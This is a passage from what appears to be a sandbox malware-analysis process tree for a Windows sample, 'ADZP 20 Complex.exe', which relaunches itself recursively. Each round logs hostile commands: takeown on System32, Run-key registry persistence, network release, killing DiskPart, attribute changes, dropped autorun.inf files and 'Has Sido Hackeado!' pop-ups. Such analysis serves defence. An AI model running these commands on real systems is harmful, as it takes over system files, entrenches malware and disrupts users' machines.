    PID:1060
- - C:\Windows\system32\msg.exe
    msg * Has Sido Hackeado!
    3⤵
    PID:4700
- - C:\Users\Admin\Desktop\ADZP 20 Complex.exe
    "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
    3⤵
    PID:3464
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\372C.tmp\374C.tmp\374D.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
      4⤵
      Drops autorun.inf file
      Drops file in System32 directory
      Modifies registry class
      PID:4504
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:4924
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:3508
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        5⤵
        
        PID:4480
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:2268
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3540
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:4700
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:952
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:2772
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        5⤵
        Kills process with taskkill
        
        PID:1200
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Drops desktop.ini file(s)
        Drops autorun.inf file
        Views/modifies file attributes
        
        PID:1372
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        5⤵
        
        PID:3620
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        5⤵
        
        PID:1060
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        5⤵
        
        PID:3916
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        5⤵
        
        PID:1600
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        5⤵
        
        PID:3760
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        5⤵
        
        PID:1652
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        5⤵
        
        PID:4796
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        5⤵
        
        PID:3028
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        5⤵
        
        PID:5144
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        5⤵
        
        PID:5172
    - - C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        5⤵
        
        PID:5212
    - - C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        5⤵
        
        PID:5228
    - - C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        5⤵
        
        PID:5244
    - - C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        5⤵
        
        PID:5260
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\46EB.tmp\46EC.tmp\46ED.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        6⤵
        Drops autorun.inf file
        Drops file in System32 directory
        Modifies registry class
        
        PID:5416
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:5720
        
        C:\Windows\system32\reg.exe
        
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
        8⤵
        Adds Run key to start application
        
        PID:5792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:5764
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        7⤵
        
        PID:5864
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:5872
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5972
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:5916
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:5984
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6008
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        
        PID:6024
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Drops desktop.ini file(s)
        Drops autorun.inf file
        Views/modifies file attributes
        
        PID:6056
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        7⤵
        
        PID:6104
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        7⤵
        
        PID:6120
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        7⤵
        
        PID:6140
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        7⤵
        
        PID:5256
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        7⤵
        
        PID:5448
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        7⤵
        
        PID:5468
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        7⤵
        
        PID:5500
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        7⤵
        
        PID:5360
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        7⤵
        
        PID:5528
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        7⤵
        
        PID:5316
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        7⤵
        
        PID:5284
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        7⤵
        
        PID:1812
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        7⤵
        
        PID:5584
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        7⤵
        
        PID:5684
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5E0D.tmp\5E0E.tmp\5E0F.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        8⤵
        Drops autorun.inf file
        Drops file in System32 directory
        Modifies registry class
        
        PID:2000
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        9⤵
        
        PID:6024
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        9⤵
        
        PID:6064
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        9⤵
        
        PID:5668
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:6080
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5564
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        9⤵
        
        PID:5700
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        9⤵
        
        PID:5852
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        9⤵
        Gathers network information
        
        PID:5708
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        9⤵
        Kills process with taskkill
        
        PID:6076
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        9⤵
        Drops desktop.ini file(s)
        Drops autorun.inf file
        Views/modifies file attributes
        
        PID:6184
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        9⤵
        
        PID:6204
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        9⤵
        
        PID:6220
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        9⤵
        
        PID:6236
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        9⤵
        
        PID:6248
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        9⤵
        
        PID:6316
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        9⤵
        
        PID:6332
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        9⤵
        
        PID:6360
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        9⤵
        
        PID:6400
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        9⤵
        
        PID:6428
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        9⤵
        
        PID:6448
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        9⤵
        
        PID:6468
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        9⤵
        
        PID:6500
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        9⤵
        
        PID:6516
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        9⤵
        
        PID:6536
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\75EB.tmp\75EC.tmp\75ED.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        10⤵
        Drops autorun.inf file
        Drops file in System32 directory
        Modifies registry class
        
        PID:6688
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        11⤵
        
        PID:6988
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        11⤵
        
        PID:7000
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        11⤵
        
        PID:7140
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        11⤵
        
        PID:7152
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        12⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6184
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        11⤵
        
        PID:6148
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        11⤵
        
        PID:6472
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        11⤵
        Gathers network information
        
        PID:6500
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        11⤵
        Kills process with taskkill
        
        PID:6524
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        11⤵
        Drops desktop.ini file(s)
        Drops autorun.inf file
        Views/modifies file attributes
        
        PID:6720
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        11⤵
        
        PID:6732
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        11⤵
        
        PID:6748
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        11⤵
        
        PID:6772
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        11⤵
        
        PID:6028
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        11⤵
        
        PID:6580
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        11⤵
        
        PID:6820
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        11⤵
        
        PID:6876
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        11⤵
        
        PID:6932
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        11⤵
        
        PID:6652
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        11⤵
        
        PID:6972
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        11⤵
        
        PID:6980
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        11⤵
        
        PID:7132
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        11⤵
        
        PID:6172
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        11⤵
        
        PID:6148
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:6472
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\825E.tmp\825F.tmp\8260.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        12⤵
        Drops autorun.inf file
        Drops file in System32 directory
        Modifies registry class
        
        PID:5852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        13⤵
        
        PID:7400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        13⤵
        
        PID:7416
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        13⤵
        
        PID:7544
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        13⤵
        
        PID:7552
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        14⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7664
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        13⤵
        
        PID:7592
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        13⤵
        
        PID:7648
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        13⤵
        Gathers network information
        
        PID:7680
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        13⤵
        Kills process with taskkill
        
        PID:7708
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        13⤵
        Drops desktop.ini file(s)
        Drops autorun.inf file
        Views/modifies file attributes
        
        PID:7736
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        13⤵
        
        PID:7792
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        13⤵
        
        PID:7800
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        13⤵
        
        PID:7824
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        13⤵
        
        PID:7864
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        13⤵
        
        PID:7892
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        13⤵
        
        PID:7932
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        13⤵
        
        PID:7956
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        13⤵
        
        PID:7988
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        13⤵
        
        PID:8004
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        13⤵
        
        PID:8024
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        13⤵
        
        PID:8044
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        13⤵
        
        PID:8088
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        13⤵
        
        PID:8132
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        13⤵
        
        PID:8148
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9579.tmp\957A.tmp\957B.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        14⤵
        Drops autorun.inf file
        Drops file in System32 directory
        
        PID:7252
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        15⤵
        
        PID:4836
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:7708
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        15⤵
        
        PID:7684
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        15⤵
        
        PID:8112
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        15⤵
        
        PID:8136
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        16⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6812
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        15⤵
        
        PID:7284
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        15⤵
        
        PID:6012
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        15⤵
        Gathers network information
        
        PID:6684
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        15⤵
        Kills process with taskkill
        
        PID:7436
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        15⤵
        Views/modifies file attributes
        
        PID:6604
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        15⤵
        
        PID:7760
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        15⤵
        
        PID:8120
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        15⤵
        
        PID:7596
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        15⤵
        
        PID:6200
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        15⤵
        
        PID:6012
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        15⤵
        
        PID:6684
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        15⤵
        
        PID:6172
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        15⤵
        
        PID:6604
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        15⤵
        
        PID:400
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        15⤵
        
        PID:1132
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        15⤵
        
        PID:1588
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        15⤵
        
        PID:3204
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        15⤵
        
        PID:856
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        15⤵
        
        PID:3204
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B361.tmp\B362.tmp\B363.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        16⤵
        
        PID:8340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        17⤵
        
        PID:8680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        17⤵
        
        PID:8688
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        17⤵
        
        PID:8824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        17⤵
        
        PID:8840
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        18⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8940
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        17⤵
        
        PID:8864
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        17⤵
        
        PID:8924
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        17⤵
        Gathers network information
        
        PID:8956
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        17⤵
        Kills process with taskkill
        
        PID:8972
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        17⤵
        Views/modifies file attributes
        
        PID:9032
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        17⤵
        
        PID:9068
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        17⤵
        
        PID:9088
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        17⤵
        
        PID:9128
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        17⤵
        
        PID:9144
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        17⤵
        
        PID:9192
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        17⤵
        
        PID:9208
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        17⤵
        
        PID:8336
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        17⤵
        
        PID:8224
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        17⤵
        
        PID:8424
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        17⤵
        
        PID:8228
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        17⤵
        
        PID:8328
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        17⤵
        
        PID:1460
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        17⤵
        
        PID:8540
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        17⤵
        
        PID:8568
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CA06.tmp\CA07.tmp\CA08.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        18⤵
        
        PID:8856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        19⤵
        
        PID:8804
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        19⤵
        
        PID:8644
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        19⤵
        
        PID:8520
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        19⤵
        
        PID:1780
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        20⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5484
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        19⤵
        
        PID:8256
        
        C:\Windows\system32\reg.exe
        
